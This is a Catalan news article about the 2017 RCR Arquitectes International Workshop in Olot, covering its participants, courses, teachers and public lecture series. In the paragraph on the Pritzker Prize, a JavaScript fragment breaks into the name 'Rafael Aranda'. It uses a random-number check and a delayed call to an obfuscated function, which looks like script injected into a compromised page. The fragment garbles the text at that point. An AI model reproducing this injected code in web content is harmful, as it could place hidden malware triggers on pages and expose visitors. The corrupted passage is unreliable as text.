VÍDEO: Olot acull el Workshop Internacional RCR Arquitectes amb 131 participants de 28 països

Comparteix-ho amb els teus amics:

Del 31 de juliol al 18 d’agost es desenvoluparà el Workshop Internacional RCR 2017 en l’Espai Barberí a Olot, seu de RCR Arquitectes i RCR BUNKA Fundació Privada.

Organitzat per RCR LAB·A Espai Barberí en col·laboració amb RCR BUNKA Fundació Privada, es combinen recerca i docència amb cultura i pensament des d’un esperit humanista i transversal.

L’Espai Barberí, una antiga foneria artística recuperada per RCR Arquitectes, ofereix l’oportunitat de viure durant un mes en un espai on es reflecteix el seu pensament i arquitectura. Aquest lloc inspirador serà el punt de trobada dels participants dels tres cursos.

Amb el desè aniversari del Workshop en 2017 neix el Laboratori Barberí com a plataforma de recerca en xarxa de temes elementals de l’arquitectura amb una activitat al llarg de tot l’any i un moment àlgid a l’agost amb el Workshop Internacional RCR.

Centrem la recerca en un tema clau, l’espai, que és essencial per crear espais vivencials, l’experiència única nascuda d’un lloc concret. Per a això proposem aprofundir en aspectes com el buit, la matèria, la llum, el temps i el silenci. L’objectiu és generar i gestar una massa crítica en la recerca de l’espai amb resultats de referència en aquesta matèria.

Aquest any, gràcies a la repercussió del Premi Pritzker 2017 per a Rafael Arandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}anda, Carme Pigem i Ramon Vilalta, comptem amb 131 participants de 28 països, amb un 56% de dones, en edats majoritàriament situades entre els 25 i 34 anys, que coincideix amb una majoria de joves professionals de l'arquitectura, seguit pel perfil d'estudiants. Això indica l'interès per una orientació i claus inspiradores per a joves en l'inici de les seves carreres.

Els països de proveniencia són majoritàriament europeus, amb una presència eminent de l'àmbit nacional, seguit per Itàlia, i amb un nombre de participants elevat provinent de Llatinoamèrica, amb una presència majoritària d'alumnes d'Argentina, Colòmbia i Mèxic. D'Àfrica i Àsia hi ha aquest any participants de l'Iraq, el Marroc, Oman, Mongòlia, Xina, l'Índia i el Japó.

La llengua vehicular és el castellà. L'anglès és segona llengua oficial del Workshop d'Estiu. Aquest any hi haurà 27 participants de parla anglesa, sent una presència cada vegada més significativa d'alumnes sense coneixements de l'espanyol que reben assistència durant el taller creatiu i les excursions. Per al Programa Obert es preveu la interpretació consecutiva de les conferències.

Els tallers

Els tallers creatius estan dissenyats seguint quatre idees centrals que vertebren el programa:

1. Format concurs: Exercicis tancats que condensen un procés complex en un temps concret
2. Transversalitat: Enfocament integrador de caràcter interdisciplinari
3. Compartir: La creativitat compartida per al foment de la capacitat de diàleg
4. Experiència: La comprensió derivada de l'observació, de la participació i de la vivència

Serà la desena edició del Workshop Internacional d'Arquitectura i Paisatge, amb la participació de 92 alumnes, 53% arquitectes i 46% estudiants, vinguts de 24 països. RCR Bunka Fundació Privada concedeix dues beques de matrícules a 2 alumnes de l'Escola Tècnica Superior d'Arquitectura de Barcelona (UPC Barcelona-Tech) que col·labora amb el Workshop certificant el taller amb el seu segell. El Workshop també compta amb la col·laboració del Màster Universitari en Arquitectura de la Universitat Nebrija de Madrid.

El workshop se centra en la vivència d'una experiència directa dels participants, donant a conèixer el territori on ha arrelat l'obra de RCR Arquitectes, amb l'objectiu d'entendre la seva relació amb el lloc i el paisatge, a l'hora de compartir i transmetre una actitud davant la vida, l'arquitectura i la creativitat, posant en pràctica els seus mètodes de treball.

Comptenb també amb un equip docent internacional de 7 professors i dos assistents, que aquest any seran Mario Cottone, Estel Ortega, Igor Peraza, Jaume Prat, Joan Puigcorbé, Emiliano Roia, Gilles Trégouët, Estat Cherel i Maria Hawkins.

Paral·lelament es desenvolupa el cinquè Workshop Internacional d'Audiovisual i Fotografia, del 7 al 18 d'agost. L'aproximació a la fotografia és a càrrec del reconegut fotògraf japonès Hisao Suzuki i la introducció al llenguatge audiovisual dirigida per Júlia de Balle, i consta de sessions teòriques i pràctiques.

Els 14 participants provenen d'Espanya, Itàlia, Regne Unit, Xile, Mèxic, el Marroc i Mongòlia, sent eminentment dones i joves professionals. Aquest any, la beca de la Universitat Nebrija es destina a la participació d'un jove professor del centre universitari en el Workshop Internacional d'Audiovisual i Fotografia.

Es segueix apostant pel foment de la transversalitat del Workshop Internacional RCR amb la segona edició del Workshop Internacional d'Escenografia, del 8 al 18 d'agost, sota la direcció del prestigiós director d'escena i escenògraf Paco Azorín, el treball del qual destaca per la seva interessant aportació estètica, així com la varietat de gèneres i formats a través dels quals ha sabut traçar una línia clarament personal. El videoartista, dissenyador gràfic, director d'escena, actor, dissenyador d'il·luminació i productor Pedro Chamizo serà professor assistent.

Aquest any participaran 25 alumnes provinents de 10 països, entre ells França, Itàlia, Rússia, Argentina, Hondures, Xina i Japó, amb una presència majoritària de dones, joves professionals. RCR Bunka Fundació Privada concedeix dues beques de matrícules a alumnes de la Real Escola Superior d'Arts Dramàtiques (RESAD) de Madrid i de l'Institut del Teatre.

Activitats paral·leles

Des de 2015 s'incorpora el Programa de Dansa, en col·laboració amb el festival de dansa Sism graf, com a línia de recerca del Workshop d'Estiu dedicada al cos i l'espai, que comparteixen els tres cursos com a punt d'intersecció. La coreògrafa Àngels Margarit, Premi Nacional de Dansa 2010 i directora artística de la casa de dansa de Barcelona Mercat de Flors, explorarà aquest any aspectes de l'espai sota el títol de “Contenidors i distàncies”.

El Programa de Disseny Gràfic es fa present amb la imatge corporativa del Workshop Internacional RCR 2017 d'Eugènia Canada Cardellach, guanyadora per votació durant el passat Workshop 2016 i un jurat presidit per RCR BUNKA Fundació Privada d'una selecció de sis projectes finals del curs 2015-2016 de l'Escola d'Art i Superior de Disseny d'Olot (EASD), tutelats pel professor de projectes gràfics Pere Álvaro Ruiz.

RCR Bunka Fundació Privada recolza el desenvolupament de competències en la formació artística a la seva ciutat, posant en valor la necessitat de crear professionals de qualitat a nivell local i donant oportunitats d'aplicar els seus coneixements en un projecte real, beneficiant-se de l'ambient creatiu i internacional del Workshop.

El Programa Obert 2017

Com en edicions anteriors, s'ofereix un Programa cultural obert al públic general compost per un cicle de conferències i l'exposició “El Taller dels Somnis”.

El lloc on s'han celebrat fins avui les conferències i s'han pogut veure les exposicions ha estat l'Espai Barberí. No obstant això, aquest any comptem amb el suport de l'Institut Municipal de Cultura d’Olot i del Museu Comarcal de la Garrotxa per presentar el Programa Obert en l'Hospici, un important equipament cultural de la ciutat en un edifici històric en el Carrer Hospici 8, a uns 500 metres de l'Espai Barberí. Això ens dóna l'oportunitat de respondre a l'aforament previst de 200 persones per a les conferències, ocasionat pel gran nombre de participants del Workshop Internacional RCR i el seu equip docent i la vocació d'obertura a un públic general de la ciutat, la comarca i un radi de públic potencial de fins a 200 km que inclou Barcelona.

El Cicle de conferències tindran lloc del 31 de juliol al 17 d'agost a les 19.30 hrs en el Pati de l'Hospici. En la primera setmana d'agost compta amb ponències dels arquitectes catalans Carlos Ferrater i Jordi Badía, amb el títol de “El Buit” el dilluns, 31 de juliol, i “Continuïtats” el dimarts, 1 d'agost. Carlos Kasner, en representació de l'empresa de promoció de fusta de frondoses nord-americanes American Hardwood Export Council (AHEC) presentarà l'exposició “El Taller dels Somnis” que ha estat creada per AHEC en el marc del festival de literatura Hi ha Festival Segòvia. El taller dels somnis és una aventura creativa que reuneix a quatre dels arquitectes i dissenyadors més brillants d'Espanya, amb talents provinents de diversos camps culturals en una celebració de la creativitat espanyola i les tècniques de fabricació artesanal amb fusta, duta a terme per la Navarresa Fusteria.

En la segona setmana d'agost, Josep-Maria Mallarach, parlarà el dijous, 3 d'agost, sobre “El buit en la Naturalesa i en la reconnexió profunda amb ella”, seguint amb el fotògraf d'arquitectura Hisao Suzuki que reflexionarà sobre el seu concepte de buit en la imatge el dimarts, 8 d'agost. Segueixen Paco Azorín, director del Workshop Internacional d'Escenografia d'aquest any, amb una conferència sobre “L'espai poètic: el que es veu és una visió de l'invisible”, el dimecres, 9 d'agost, i la ballarina i coreògrafa Àngels Margarit amb la seva presentació de “Contenidors i distàncies” el dijous, 10 d'agost.

La tercera setmana d'agost, l'arquitecte i editor de la revista d'arquitectura contemporània El Croquis Richard Levene ens explicarà d'“Arquitectures de còmic” el dimecres, 16 d'agost. Els arquitectes madrilenys Cristina Díaz Moreno i Efrén García Grinda de l'estudi amid.zero9 tanquen el cicle de conferències amb una ponència titulada “Macaronic” el dijous, 17 d'agost.

La clausura de Workshop Internacional RCR 2017 se celebra el divendres, 18 d'agost, de 15:30 a 20:30 hrs en el Pati de l'Hospici amb una presentació de treballs dels tallers del Workshop Internacional RCR i lliurament de diplomes, tancant amb un sopar i celebració en l'Espai Barberí, alma mater i seu de RCR Arquitectes.

Info i fotos: Workshop Internacional RCR

Comparteix-ho amb els teus amics: